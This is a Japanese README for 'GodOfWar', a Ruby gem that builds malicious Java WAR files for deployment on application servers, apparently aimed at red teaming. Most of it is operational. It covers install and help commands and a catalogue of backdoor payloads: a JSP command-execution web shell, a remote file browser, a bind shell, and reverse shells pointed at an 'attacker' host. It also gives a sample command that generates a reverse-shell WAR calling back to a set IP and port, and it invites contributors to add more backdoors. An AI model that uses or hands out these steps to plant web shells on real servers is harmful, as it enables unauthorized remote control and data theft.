
GodOfWar - 悪意のあるJava WARビルダー(内蔵ペイロード付き)
ペネトレーションテスト / レッドチーム目的のためのWARペイロードを生成するコマンドラインツール。Rubyで書かれています。
.
hhh
hhhhhhh
hhhhhhhh
hhhhhhhh+
hhhhhhhh'
hhhhhhhh.
hhhhhhhhh
..-- hhhhhhhhh
-sh/.. +. hhhhhhhhh:
/+/:-/+ss-` hhhhhhhhhh:
/MMM`ss:``.` hhhhhhhhhh:
.MMMMM: hhhhhhhhhhhhhhhhh:
MMMMMMM: hhhhhhhhhhhhhhhh:
MMMMMMMMMMMMM: hhhhhhhhhhhhhhhh`
:NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`
./:`smdo+oos++- `++sNMMMMMNmh+
.-y-` ` :. / -dmddhhhhh-
o/- `//o/ /M/ `+hhhhhhhh`
/o :yosmy +y .`.hhhhhhhho
+` /../.: `.y::hhhhhs:`
` `+yys` .sy` /oohhy:
`/:s/-`` `.hh`
..` ` y+
.hNNmmNdymmmmds` :-
hs. ``.. :y- `
-hhmNmddm+ .
`NMMMMMMm
` `oMMy
`. /Md- :o
MMMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMM.
`MMMMMMMMMMMMM.
:sNMMMNMdo:
``+m:/-
`
GodOfWar - 悪意のあるJava WARビルダー。
-l/--list を試してください)
--host/--port を試してください)$ gem install godofwar
$ godofwar -h
ヘルプメニュー:
-p, --payload PAYLOAD 利用可能なペイロードの1つからWARを生成します。
(-l/--list を確認)
-H, --host IP_ADDR 選択したペイロードのローカルまたはリモートIPアドレス
(-p/--payload と併用)
-P, --port PORT 選択したペイロードのローカルまたはリモートポート
(-p/--payload と併用)
-o, --output [FILE] 出力ファイルとデプロイ名。
(デフォルトはペイロードの元の名前。'-l/--list' を確認)
-l, --list 利用可能なすべてのペイロードを一覧表示。
-h, --help このヘルプメッセージを表示。
すべてのペイロードを一覧表示
$ godofwar -l
├── cmd_get
│ └── 情報:
│ ├── 説明: Webインターフェースを介したコマンド実行
│ ├── OS: 任意
│ ├── 設定: {"false"=>"設定は不要です!"}
│ ├── 使用方法: http://host/cmd.jsp?cmd=whoami
│ ├── 参照: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── ローカルパス: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── 情報:
│ ├── 説明: リモートファイルブラウザ、ファイルのアップロード、ダウンロード、解凍、ネイティブコマンド実行
│ ├── OS: 任意
│ ├── 設定: {"false"=>"設定は不要です!"}
│ ├── 使用方法: http://host/filebrowser.jsp
│ ├── 参照: ["http://www.vonloesch.de/filebrowser.html"]
│ └── ローカルパス: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── 情報:
│ ├── 説明: TCPバインドシェル
│ ├── OS: 任意
│ ├── 設定: {"port"=>4444, "false"=>"設定は不要です!"}
│ ├── 使用方法: http://host/reverse-shell.jsp
│ ├── 参照: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └── ローカルパス: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── 情報:
│ ├── 説明: ブラウザからLHOSTとLPORTを設定するHTMLフォーム付きTCPリバースシェル
│ ├── OS: 任意
│ ├── 設定: {"host"=>"attacker", "port"=>4444, "false"=>"設定は不要です!"}
│ ├── 使用方法: http://host/reverse_shell_ui.jsp
│ ├── 参照: []
│ └── ローカルパス: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── 情報:
│ ├── 説明: TCPリバースシェル。LHOSTとLPORTはハードコードされています
│ ├── OS: 任意
│ ├── 設定: {"host"=>"attacker", "port"=>4444, "false"=>"設定は不要です!"}
│ ├── 使用方法: http://host/reverse_shell.jsp
│ ├── 参照: []
│ └── ローカルパス: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
LHOSTとLPORTを指定してペイロードを生成
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
デプロイ後、シェルにアクセスできます (http://host:8080/puppy/puppy.jsp)
さらにバックドアを追加して貢献するには:
payloads ディレクトリの下に新しいフォルダを作成する。jsp ファイルを配置する(ディレクトリ名と同じにする)。payloads_info.json ファイルを更新し、以下の項目を追加する。
このgemはオープンソースであり、MITライセンスの条件の下で利用可能です。